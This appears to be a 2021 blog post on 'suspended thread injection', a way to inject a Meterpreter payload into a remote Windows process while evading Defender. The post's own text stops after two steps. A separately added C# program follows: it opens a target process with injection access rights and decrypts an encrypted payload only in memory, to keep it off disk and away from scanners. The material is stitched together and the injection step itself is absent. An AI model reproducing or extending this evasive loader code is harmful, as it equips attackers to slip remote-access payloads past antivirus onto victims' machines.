Tuesday, October 19, 2021

Suspended Thread Injection: Another Meterpreter injection technique using C# that attempts to bypass Defender

Introduction

This code was written after reading Bypassing Windows Defender Runtime Scanning by F-Secure Labs. The technique described here is not the same one, but that post got me thinking about how to inject Meterpreter into a remote process while staying under Defender's radar.

The technique is quite simple:

1. Open a remote process using OpenProcess.

2. Decrypt the meterpreter payload in memory…
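The two steps listed so far, as an added C# example that is not the post's own code. It opens the target with OpenProcess through P/Invoke and decrypts a payload in memory; what the post then does with the decrypted bytes (the suspended thread the title refers to) is not part of this excerpt and is not shown. The access mask, the use of AES-256-CBC, and the sample payload (four harmless bytes, constructed here) are all assumptions, not details taken from the post.

```csharp
using System;
using System.ComponentModel;
using System.Diagnostics;
using System.Runtime.InteropServices;
using System.Security.Cryptography;

// Added example, not the post's code: only the two steps the excerpt lists,
// open the target with OpenProcess and decrypt the payload in memory.
class InjectionPrep
{
    // Access rights an injector usually needs on the target. The mask the
    // post actually requests is not visible in the excerpt (assumption).
    const uint PROCESS_CREATE_THREAD     = 0x0002;
    const uint PROCESS_VM_OPERATION      = 0x0008;
    const uint PROCESS_VM_READ           = 0x0010;
    const uint PROCESS_VM_WRITE          = 0x0020;
    const uint PROCESS_QUERY_INFORMATION = 0x0400;

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern IntPtr OpenProcess(uint dwDesiredAccess, bool bInheritHandle, uint dwProcessId);

    [DllImport("kernel32.dll", SetLastError = true)]
    static extern bool CloseHandle(IntPtr hObject);

    // Step 1: open the remote process. Fail loudly: a NULL handle means
    // OpenProcess denied the request (bad PID, protected process, or not
    // enough privilege), and every later call on the handle would fail anyway.
    public static IntPtr OpenTarget(int pid)
    {
        uint access = PROCESS_CREATE_THREAD | PROCESS_VM_OPERATION | PROCESS_VM_READ
                    | PROCESS_VM_WRITE | PROCESS_QUERY_INFORMATION;
        IntPtr hProcess = OpenProcess(access, false, (uint)pid);
        if (hProcess == IntPtr.Zero)
            throw new Win32Exception(Marshal.GetLastWin32Error());
        return hProcess;
    }

    // Step 2: decrypt the payload in memory. AES-256-CBC is an assumption;
    // the excerpt does not name the cipher. The plaintext exists only in
    // this byte[] and is never written to disk.
    public static byte[] DecryptPayload(byte[] ciphertext, byte[] key, byte[] iv)
    {
        using (Aes aes = Aes.Create())
        {
            aes.Key = key;
            aes.IV = iv;
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.PKCS7;
            using (ICryptoTransform dec = aes.CreateDecryptor())
                return dec.TransformFinalBlock(ciphertext, 0, ciphertext.Length);
        }
    }

    // Used here only to build the sample input; a real build would ship the
    // ciphertext and keep the key out of the binary's plain strings.
    public static byte[] EncryptPayload(byte[] plaintext, byte[] key, byte[] iv)
    {
        using (Aes aes = Aes.Create())
        {
            aes.Key = key;
            aes.IV = iv;
            aes.Mode = CipherMode.CBC;
            aes.Padding = PaddingMode.PKCS7;
            using (ICryptoTransform enc = aes.CreateEncryptor())
                return enc.TransformFinalBlock(plaintext, 0, plaintext.Length);
        }
    }

    static void Main(string[] args)
    {
        // Constructed stand-in for the Meterpreter payload: nop, nop, nop, ret.
        byte[] samplePayload = { 0x90, 0x90, 0x90, 0xC3 };
        byte[] key = new byte[32];
        byte[] iv = new byte[16];
        using (var rng = RandomNumberGenerator.Create())
        {
            rng.GetBytes(key);
            rng.GetBytes(iv);
        }
        byte[] encrypted = EncryptPayload(samplePayload, key, iv);

        // Target PID from the command line; defaults to this process so the
        // example runs without a separate victim.
        int pid = args.Length > 0 ? int.Parse(args[0]) : Process.GetCurrentProcess().Id;

        IntPtr hProcess = OpenTarget(pid);
        try
        {
            byte[] decrypted = DecryptPayload(encrypted, key, iv);
            bool roundTrip = decrypted.Length == samplePayload.Length;
            for (int i = 0; roundTrip && i < decrypted.Length; i++)
                roundTrip = decrypted[i] == samplePayload[i];
            Console.WriteLine("Opened PID {0}, handle 0x{1:X}; decrypted {2} payload bytes in memory (round trip {3})",
                pid, hProcess.ToInt64(), decrypted.Length, roundTrip ? "ok" : "FAILED");
        }
        finally
        {
            CloseHandle(hProcess);
        }
    }
}
```

Run it with a PID as the first argument (or none to target itself). Requesting only the rights the later steps need, and checking the handle before going further, keeps the failure visible at OpenProcess rather than at a later write; keeping the decrypted bytes in a single byte[] means the cleartext payload never touches disk, which is the point of decrypting at runtime.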
